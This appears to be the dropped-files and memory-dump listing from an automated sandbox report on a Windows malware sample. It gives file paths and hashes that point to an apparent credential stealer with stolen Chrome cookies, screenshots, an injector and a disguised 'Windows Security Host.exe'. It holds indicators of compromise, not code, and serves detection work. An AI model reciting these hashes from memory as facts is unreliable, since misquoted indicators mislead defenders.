4bbc21c07c05ee1f783242f0fb59324d5ff9ae18bdf892f02980d582fed83380888eeba58e1a6a321507cfd5d4fe82a328a0d3482b29633be4e3ebbeac636f87

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4a7bda9b45ba6ee686913ae7f951892c

SHA1
1e940b9eda9cd1c93d223d5882d3a31cd835067f

SHA256
201ba613552507f86dad4b2ee98e415b11eca698dfdd72ba1e0bf0b2c230bc9a

SHA512
68e505268d225f9734c3307a29d9043d03171cf7390229e3500d7c04fd2e5f0c941d6a96a2dd010c136d1d3797ac1ccd64685d7175a1a7eb9915920fdcf52fe8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
894afb4ff3cd7ee1f69400e936f8fc9d

SHA1
aa0eb6ac58f8997940c1aa2e6f6c42d7c3837e51

SHA256
20948b37924c58362ffc5d1472667b53c6d7fc865ad541c901cebf41d04a03c9

SHA512
449494468d267f9689a277ce858dac7dfda04ceb568f60170645582fd631901a9ef780da8e420cba8a297edc11cd63a874e3429b95cf90e7261d2b9ab8850e98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
711b161528f4959c4b7463036c7324ec

SHA1
53b30cc796c0dfe0cd4c4406202a19139cb5407d

SHA256
7c077fb04d4911778ab648b657b43c9b464393d734dc7fa029ee0f085c6a5638

SHA512
565d0e3e229894de91ad37a16c261bf380e983ffda750f32e8ad361c0606c62043a0188f45d252fecabc6438bc9e7b2c424b101073162ba9633bacd03b42af9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0ac871344dc49ae49f13f0f88acb4868

SHA1
5a073862375c7e79255bb0eab32c635b57a77f98

SHA256
688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37

SHA512
ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
6490e5c0581c173062323b1c20cfd9ff

SHA1
1652893659f99b780fd9733243637eb7795f5212

SHA256
a552b6d7bebb1714f01a5f3d8b5493e1b369c93ee68c62256dfddcc7f3f4fe79

SHA512
fdb077b40b4371a74cb70ae74d28a4433399e5c4a69fe9a5652409a62c2435d3197da42808d5cb65e9b7ff35bc2e593ad70fa83581c7fd672d631b25f53d3c65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7332074ae2b01262736b6fbd9e100dac

SHA1
22f992165065107cc9417fa4117240d84414a13c

SHA256
baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

SHA512
4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

Download Submit
C:\Users\Admin\AppData\Local\Temp\3UJkvWEaubs2bu5

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\Injector.exe

Filesize
229KB

MD5
3882cfe50e35985982e9ef0c01b99c47

SHA1
6e09c71ae230b839163628c9179b3a3aac58c1a3

SHA256
da73db144e8035dd81ab4578b7f856131351ec33119c9ce0c46d852499621636

SHA512
a539767dc599b8a6103c413b4a42c83c7ce09d3171c45890f2630ad000166854c5ac220f78ab966ea90c55c1d6361ce70ea5ab3671fc2913445e8009126a534e

Download Submit
C:\Users\Admin\AppData\Local\Temp\PUkCCrTGBYF4RlZ\Display\Display.png

Filesize
30KB

MD5
91088f5881ed0d15235836f108f9894c

SHA1
bb3c04e63f30e95fcf40531c696b262a55540c79

SHA256
cb760eca7542a3655bdf0bbfebdde821059c68c1d993cf74e31d911e86ffbe87

SHA512
28dc240c94b4ef8a085569b4261bdc8c96896ac2289e4f762b02d8c4ecd037c0524cbf1b16927c3a7709080d3b11b6496e154229dbc7723e483f5f3933c655ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe

Filesize
79KB

MD5
c7ba63ce2ed6d0aab93ad839e0eddd68

SHA1
087ffd969b37a73b349a81af18bb51191eb42cbd

SHA256
84be55fb4b514ebdb999b5caf4e0837c521b5e7a4f85f636e4593daf09eedae9

SHA512
9f63cfdb94af23cebc85ffd491364c1a90ab90736fc8da0fe16ebf2fb18e9a6eb8fea4dfca87d8353565ba684b0c8f461371588aac72101b355886619bf672f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1hw2ghe4.0r3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\csfemm.exe

Filesize
397KB

MD5
9d2618ba67f2d0f38182d44e60f00210

SHA1
6ac0946cee9e4a7ec449ba9acf834884c1f6bf18

SHA256
3e7e2d43fa4e0338a688f5be292f8f3d813aa525e2652382c11602eeeec43b76

SHA512
54c63677d64a83ddccaa72afa87c8d735b55016d80071b16c39da88bcd75de988c3ba865196cd4273ca99baa63469a58df1b778c8755a36c80968542dfcf1f09

Download Submit
C:\Users\Admin\AppData\Local\Temp\hF2jqsH2KeDy7GU\Browsers\Cookies\Chrome Cookies.txt

Filesize
260B

MD5
ce43c339546559c708ec4b197fa3e040

SHA1
b57b96a98106ee15cc9bdf5c09bbfbcfae6e277e

SHA256
463d52605796e2272333a7c20373c552d13cc6a9c919ac07352641b8a1b2999b

SHA512
d81914d51eee2351e41dc9b3de4ea8a5fe7768dcce7ca091d895ccab5350f4911a25d0d4778c83fc80910e19bd9e7c76cf24a92e34852a710774f852354c135a

Download Submit
C:\Users\Admin\AppData\Local\Temp\hF2jqsH2KeDy7GU\Display\Display.png

Filesize
410KB

MD5
017c3c86a90ba8ded64eef68d6b09130

SHA1
f7b2aaeff83a15e3f8d019f05f4e3aab065130eb

SHA256
5596bd798bc6b1b910203c96bab66dc75dd61fd4f685a4ae2eeeff01037f201c

SHA512
320eff4d187121a5c396ad713473ba7a62e8c196def8969699459ddd150fbd2dd4369bd161ed412419a883c691f5b09fffcd2b3b7913784c995cc345ebaae369

Download Submit
C:\Users\Admin\AppData\Local\Temp\hn7KiX4Ywh5Ybas

Filesize
20KB

MD5
40f5dfec267b2cf6dcb87bc4a8f44dc0

SHA1
47154efebb935795890cbb3d977556b2dfcbd529

SHA256
3a8131b0be6e1d9368864fcc35e671aab486765c8aa8d2c61a0859aeb702c99b

SHA512
3627eceecfc62cb1a2697980796d900eaeb06f6b60397c1ba36d8f57251e5771c0522b5a9481d536fba1ded10b73d01879d02a3a1aebcb26e476abbfca3107f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\hn7KiX4Ywh5Ybas

Filesize
20KB

MD5
22be08f683bcc01d7a9799bbd2c10041

SHA1
2efb6041cf3d6e67970135e592569c76fc4c41de

SHA256
451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457

SHA512
0eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936

Download Submit
C:\Users\Admin\AppData\Local\Temp\rOd8wQL25A2qImN

Filesize
46KB

MD5
14ccc9293153deacbb9a20ee8f6ff1b7

SHA1
46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3

SHA256
3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511

SHA512
916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/412-414-0x0000000002AA0000-0x0000000002AAC000-memory.dmp

Filesize
48KB

Download
memory/412-29-0x00000000007F0000-0x000000000080A000-memory.dmp

Filesize
104KB

Download
memory/412-761-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

Filesize
10.8MB

Download
memory/412-31-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

Filesize
10.8MB

Download
memory/412-190-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

Filesize
10.8MB

Download
memory/2352-106-0x0000025BA58E0000-0x0000025BA58F2000-memory.dmp

Filesize
72KB

Download
memory/2352-25-0x0000025B8B010000-0x0000025B8B050000-memory.dmp

Filesize
256KB

Download
memory/2352-104-0x0000025BA58A0000-0x0000025BA58AA000-memory.dmp

Filesize
40KB

Download
memory/2352-28-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

Filesize
10.8MB

Download
memory/2352-163-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

Filesize
10.8MB

Download
memory/2352-59-0x0000025BA5780000-0x0000025BA57D0000-memory.dmp

Filesize
320KB

Download
memory/2352-58-0x0000025BA57D0000-0x0000025BA5846000-memory.dmp

Filesize
472KB

Download
memory/2352-61-0x0000025BA5870000-0x0000025BA588E000-memory.dmp

Filesize
120KB

Download
memory/2508-37-0x0000022E7FF50000-0x0000022E7FF72000-memory.dmp

Filesize
136KB

Download
memory/2932-30-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

Filesize
10.8MB

Download
memory/2932-0-0x00007FFBA89E3000-0x00007FFBA89E5000-memory.dmp

Filesize
8KB

Download
memory/2932-1-0x0000000000830000-0x00000000008A2000-memory.dmp

Filesize
456KB

Download
memory/2932-10-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

Filesize
10.8MB

Download
memory/3780-1292-0x0000000000400000-0x000000000046A000-memory.dmp

Filesize
424KB

Download